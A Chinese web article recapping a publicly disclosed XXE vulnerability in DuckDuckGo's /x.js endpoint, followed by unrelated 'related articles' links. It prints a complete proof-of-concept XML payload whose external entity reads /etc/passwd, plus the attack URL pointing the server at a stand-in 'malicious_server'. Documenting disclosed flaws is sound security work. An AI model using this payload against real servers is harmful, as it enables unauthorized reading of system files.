DuckDuckGo搜索引擎的XXE漏洞

访客3年前黑客工具518

近期,白帽汇安全研究院发现hackerone网站披露了DuckDuckGo搜索引擎的一个XXE漏洞。


DuckDuckGo是一个出现于2011年的互联网搜索引擎,其总部位于美国宾夕法尼亚州。和传统搜索引擎(谷歌,必应等)相比,DuckDuckGo着重保护用户的隐私,不监控、不记录用户的搜索内容,还会自动处理用户发出HTTP请求中的敏感信息(如Referer头),尽量减少第三方能获取的信息。


漏洞详情


漏洞发现者在浏览测试https://duckduckgo.com网站时,发现在路径/x.js中的参数?u存在XXE注入。


只要输入一个远程的xm l资源http://malicious_server/xxe.xml,服务器就会解析并执行,并返回一个输出。


而且网站对xm l代码没有任何控制,所以攻击者可以引入一些恶意xm l代码,对服务器进行攻击。


具体步骤如下


1.攻击者在他所控制的服务器中放上一个恶意xml文件,并对公网开放,文件内容如下。


<?xm l version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>


2.直接访问链接https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml


3.返回的页面可以看到xm l文件解析结果


DuckDuckGo搜索引擎的XXE漏洞

相关文章

外交部:搞“谎言外交警察故事2013粤语”破坏中美关系必将遭到

  新华社北京1月8日电(记者伍岳、马卓言)外交部发言人华春莹8日在例行记者会上说,美国国务卿蓬佩奥搞“谎言外交”,为一己私利不择手段打压中国,蓄意破坏中美关系,违背中美两国人民友好民意,必将遭到历史...

黄帝内经治疗失眠怎么做呢?

黃帝內經治療失眠怎麼做呢?讀書啊,我信赖但有朗朗書聲出破廬,遲早有一日有萬鯉躍龍門之奇象。 文章導讀 現代人的事情生涯壓力非常大,導致不少人出現瞭神經虚弱等癥狀,而這種癥狀最大的影響就是造成人...

正宗小龙坎火锅叫什么(小龙坎火锅是哪里的)

正宗小龙坎火锅叫什么(小龙坎火锅是哪里的)

一入火锅深似海,从此清淡是路人&hellip;… 【小龙坎老火锅】太原长风店那家已经打卡好几次了,有次听小伙伴说有假冒的店诶,也不知道真的假的。哈哈,不过好吃是真的,也就不管他了。 昨天路...

win10电脑遭到黑客咋办(win10电脑发现威胁)

win10电脑遭到黑客咋办(win10电脑发现威胁)

本文导读目录: 1、win10电脑在没有任何提示的情况下被黑客控制? 2、win10系统的电脑被黑客攻击,开机电脑上显示LTWZ_ ,怎么办? 3、win10和苹果手机12如何预防被黑客入侵?...

如何搭建一个case评测流程(二)

如何搭建一个case评测流程(二)

编辑导语:上篇作者说到了case评测尺度,本篇文章就可以正式开始举办case评测,本篇将以搜索为例详细讲一下搜索是怎么举办case评测的,我们一起来看一下。 一、谁来参加 凡是在搜索团队内部,会把这...

10道经典面试题!聊一聊“面试”的那些事

10道经典面试题!聊一聊“面试”的那些事

编辑导语:每次口试都是一种生长,与差异的人相同也是一种进修;出格是口试,针对差异的公司和岗亭,对应的问题都是有针对性,越发检验我们的思考本领和应变本领;本文作者分享了十道经典的口试题并举办理会,我们一...